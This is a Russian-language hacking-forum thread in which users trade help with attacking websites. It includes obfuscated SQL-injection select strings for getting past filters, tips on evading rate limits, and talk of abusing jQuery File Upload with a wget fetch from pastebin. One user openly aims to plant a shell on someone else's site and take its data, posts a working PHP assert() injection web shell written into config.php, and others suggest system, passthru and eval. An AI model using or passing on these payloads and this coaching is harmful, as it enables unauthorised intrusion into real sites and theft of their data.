Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    195
    Likes Received:
    44
    Reputations:
    0
    /*!5000select*/
    /*!12345select%20all*/
    /*!12345select%0aall*/
    ++
    buffer owerflaw ;)
     
    crlf likes this.
  2. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    щас попробуем
     
  3. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Не получается получаем 404 на выходе....
    Скуля вида sete,com/asd(Sqlini).html
     
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    838
    Likes Received:
    1,032
    Reputations:
    32
    Тут гадать никто не будет что там у тебя. тебе дали не решение , а направление. Дальше сам.
     
    man474019, BigBear and crlf like this.
  5. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Гадать то некто и не просит,проблема известна)
     
  6. MrBa

    MrBa New Member

    Joined:
    10 Jan 2017
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Можно ли как то обойти HTTP error code: 429 (Too Many Requests)?
    Прокси пробовал, не помогает
     
  7. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,039
    Likes Received:
    616
    Reputations:
    186
    пробуйте не только ip менять ,но и заголовки браузера .
     
    _________________________
  8. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    195
    Likes Received:
    44
    Reputations:
    0
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    429
    Likes Received:
    76
    Reputations:
    18
    Привет, помогите есть плагин jQuery File Upload обычно через него легко залится но в этом случае мешает .htaccess и за которого файл принудительно скачивается. перезаписать не получается, заливается просто htaccess без точке (
    https://github.com/blueimp/jQuery-File-Upload/tree/master/server/php/files

    UPD:
    пересмотрел 3 раза не могу понять что он там баипасит, как файл может выполняться при скачивание?
     
    #2509 Octavian, 8 Dec 2018 at 8:04 PM
    Last edited: 8 Dec 2018 at 9:22 PM
  10. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,039
    Likes Received:
    616
    Reputations:
    186
    В ту директорию куда он льет по умолчанию файл только дает скачаться, он написал код чтобы стянул с pastebin на 2 директории выше ../../ wget
     
    _________________________
  11. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    429
    Likes Received:
    76
    Reputations:
    18
    Дает скачивание после выполнение?
     
  12. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,039
    Likes Received:
    616
    Reputations:
    186
    да не факт, у него может быть и просто фейковое видео, любят они такое ,а залиться мог и заранее.
     
    _________________________
  13. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    429
    Likes Received:
    76
    Reputations:
    18
    А в моем случае с htaccess настройками можно что то сделать?
    https://github.com/blueimp/jQuery-File-Upload/tree/master/server/php/files
     
  14. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,039
    Likes Received:
    616
    Reputations:
    186
    _________________________
  15. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    408
    Likes Received:
    677
    Reputations:
    254
    Чувак, если ты задал вопрос на форуме, нафига его дублировать мне в телегу? :)

    Это вопрос только для автора видео. Комменты там открыты, спроси что за зиродеи он использует. Потом нам расскажешь :)

    Недавно была шумиха, про якобы "дырявость" и разработчики упомянули об этом.

    Стоит отметить, что JQuery File Upload это просто файловый загрузчик, он может и должен грузить что угодно. При этом, нормально настроенный конфиг не даёт лить что попало.
    Был там в стоке фейл с регуляркой, но перед внедрением подобных скриптов в свои проекты, если не аудировать, то хотя бы, нужно производить детальную настройку. И скрипт даёт такую возможность, путём изменения значений в методе __construct для PHP варианта.
     
    cat1vo likes this.
  16. L73898UNIT

    L73898UNIT New Member

    Joined:
    Sunday
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет, может кто подскажет.
    На один сайт недавно поставили какой-то телеграм-чат-хелпер. Но забыли закрыть чтение дериктории этого чата.
    Можно как-то воспользоваться этим, залить шелл и вытянуть всю инфу с сайта? Как?
    p.s. открывается только chat.html; ..install.php; ...css/db/js и две папки сверху (пустые).
    В инсталяторе чата не нашел какой-то возможности загрузить свой файл на сервер
    Сорри за нубские вопросы, спасибо
    Скрины ниже, буду благодарен любой помощи.
     

    Attached Files:

  17. L73898UNIT

    L73898UNIT New Member

    Joined:
    Sunday
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    UPD: Пробовал внести вредоносный скрипт через пароль менеджера (перезаписывает config). Вышло только с phpinfo(), а другие функции "show_source, system, shell_exec, passthru, exec, popen, proc_open" - отключены в disable_functions. Подскажите, как еще можно реализовать атаку?
     
  18. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    600
    Likes Received:
    359
    Reputations:
    252
    Попробуй eval, assert.
     
    L73898UNIT and panic.ker like this.
  19. L73898UNIT

    L73898UNIT New Member

    Joined:
    Sunday
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Успешно внедрил в ..config.php 1"); assert(stripslashes($_REQUEST[cmd])); /*

    И теперь можно делать так: https://site.com/chat/..config.php?cmd=phpinfo()

    Круто, но более интересные функции не работают, даже phpversion()... если я конечно правильно использую эти функции:) Может проблема в том, что перезаписью ..config.php ничего не добиться?

    Также в phpinfo заметил:
    allow_url_fopen On

    allow_url_include On
     
  20. Gorbachev

    Gorbachev Member

    Joined:
    23 Mar 2017
    Messages:
    115
    Likes Received:
    20
    Reputations:
    3
    Так тебе же коллеги писали, пробуй system() passthru() copy(), но сначала найди врайтабельную папку предварительно, доступную из под веба. И не забывай, тебя дома ждет семья.
     
Loading...